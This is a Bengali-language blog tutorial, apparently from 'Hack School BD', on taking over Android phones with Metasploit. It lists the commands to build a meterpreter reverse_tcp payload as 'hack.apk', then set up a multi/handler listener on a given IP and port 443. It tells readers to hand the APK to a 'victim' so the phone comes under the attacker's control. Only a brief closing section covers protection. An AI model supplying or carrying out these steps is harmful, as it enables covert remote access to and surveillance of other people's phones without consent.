Sunday, 19 June 2016
সবাইকে স্বাগতম জানাচ্ছি, হ্যাক স্কুল বিডির টিউটোরিয়ালে,
বর্তমান সময়ের মোবাইল অপেরেটিং সিস্টেমের মধ্যে অন্যতম একটি অপারেটিং সিস্টেম হচ্ছে Android.দিন থেকে দিন Android ইউজার বেড়েই চলেছে, ব্যবহারকারীর সংখ্যা যেমন বাড়ছে তেমনি এর সাথে সাথে অপরেটিং সিস্টেমটির বিভিন্ন বা দুর্বলতাও বৃদ্ধি পাচ্ছে,
আজকের টিউটোরিয়ালে আমি আপনাদের দেখাবো কিভাবে Metasploit ব্যবহার করে Android ফোন হ্যাক করা যায়,
এর জন্যে আপনার দরকার হবে Metasploit framework (আমি কালি লিনাক্সে ব্যবহার করে দেখাবো টিউটোরিয়ালে।)
এবং টেস্টের জন্যে (যদি আপনি চান) তাহলে একটি স্মার্ট ফোন।
এছাড়াও আমি অনেক বার ফেইসবুকে অনুরোধ পেয়েছি Android ফোন হ্যাকিং এর টিউটোরিয়ালের ব্যাপারে,
সুতারাং তাই আজ আমি আপনাদের দেখাবো কিভাবে Android ফোন হ্যাক করা যায়।
(যারা উইন্ডোজ ব্যবহার করে করতে চান তারা Metasploit framework উইন্ডোজ ভার্সন টা ব্যবহার করতে পারেন,গুগল সার্চ করলেই ডাউনলোড লিঙ্ক পেয়ে যাবেন)
প্রথমেই Android কি সেটা সম্পর্কে
উইকিপিডিয়া থেকে আমরা জানতে পারি যে
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.APK ফাইল কি সেটাও হয়তো, আপনারা সবাই জানেন তারপরেও আসুন দেখি উইকিপিডিয়াতে কি আছে এটা সম্পর্কে
Android application package file (APK) is the file format used to distribute and install application software and middle ware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu. -হ্যা আরেকটা কথা, Metasploit রান করানোর জন্যে আপনার পোর্ট ওপেন থাকা লাগবে যদি আপনি রাউটার ব্যবহারকারী হন তাহলে কাজটি সহজেই করতে পারবেন গুগল সার্চ করলে এটার জন্যে অনেক টিউটোরিয়াল পাবেন, আর আপনি রাউটার ইউজার না হলে ভিপিএন ব্যবহার করতে পারেন।
এখন চলুন আমি আপনাদের একটি লাইভ ডেমোর মাধ্যমে দেখানোর চেষ্টা করি কিভাবে এট্যাক করবেন
টিউটোরিয়াল সম্পর্কিত তথ্যঃ
টিউটোরিয়ালে যে এট্যাকার মেশিন থেকে এট্যাক বা হ্যাক করা হবে তার আইপিঃ 192.168.8.94
এবং ওপেন পোর্ট হচ্ছেঃ 443
প্রথমেই আমি কালি লিনাক্সের টার্মিনাল ওপেন করলাম
msfpayload android/meterpreter/reverse_tcp LHOST=<hacker_ip_address> LPORT=<port_to_receive_connection>
এবং এই কমান্ডটি লেখে এন্টার করলাম। LHOST=আপনার আইপি এড্রেস LPORT=ওপেন পোর্ট নং।
-
এবার msfconsole কমান্ডটি লেখে এন্টার দিন টার্মিনালে, metasploit console এ যাওয়ার জন্যে,
এইবার নিচের কমান্ডটি লিখে এন্টার চাপুনঃ
use exploit/multi/handler --> আমরা Metasploit Handler ব্যবহার করছি।
এরপরে
set payload android/meterpreter/reverse_tcp --> এই কমান্ডটি লেখুন টার্মিনালে প্রথম স্ক্রিনশটটি অনুসরন করে এবং এন্টার চাপুন
নিচের স্টেপটি ধাপে ধাপে অনুসরন করুন
set lhost 192.168.8.94 –> এট্যাকার বা আপনার আইপি এড্রেস
set lport 443 –> ওপেন পোর্ট নং যেটার মাধ্যমে রিভার্স কানেকশন রিসিভ করা হবে।
exploit –> এখন ইনকামিং কানেকশন রিসিভ করার জন্যে রেডি আপনার পিসি বা মেশিন :p
প্রথম স্ক্রিনশটে আমরা একটি apk ফাইল বানিয়েছিলাম hack.apk (এটা আমাদের দিতে হবে ভিকটিমকে, যদি সে রান করায় ফাইলটা তার Android ফোনে তাইলেই কাজ শেষ :))
এখন আমি আমার নিজের এন্ড্রয়ড ফোনে hack.apk ফাইলটি রান করানোর সাথে সাথে metasploit console দেখালো যে কানেক্ট হয়েছে।
ছবিতে দেখুনঃ
যদি আমি নিজের Android ফোন কি ভিকটিমের ফোন হিসেবে ধরে নেয় তাহলে এখন আমার আন্ডারে এখন আছে ভিকটিমের মোবাইল 
কিভাবে নিজেকে সিকিউর করবেন বা নিজে সিকিউর থাকবেন।
১. ভুলেও কখনো unknown source থেকে apk file ইন্সটল করবেন না।
২.যদি করেন তাহলে করবেন এমন ফাইল যেটার সোর্স রিড করা যায় যার মাধ্যমে আপনি ইন্সটল করার আগেই দেখে নিতে পারেন যে সফটওয়্যারটি ক্ষতিকারক নাকি না।
আমার বানানো hack.apk ফাইলটির সোর্স কোড
এবং কোনো প্রকার সমস্যা হলে আমার ফেইসবুক আইডিতে আমার সাথে যোগাযোগ করতে পারেন।
ধন্যবাদ।
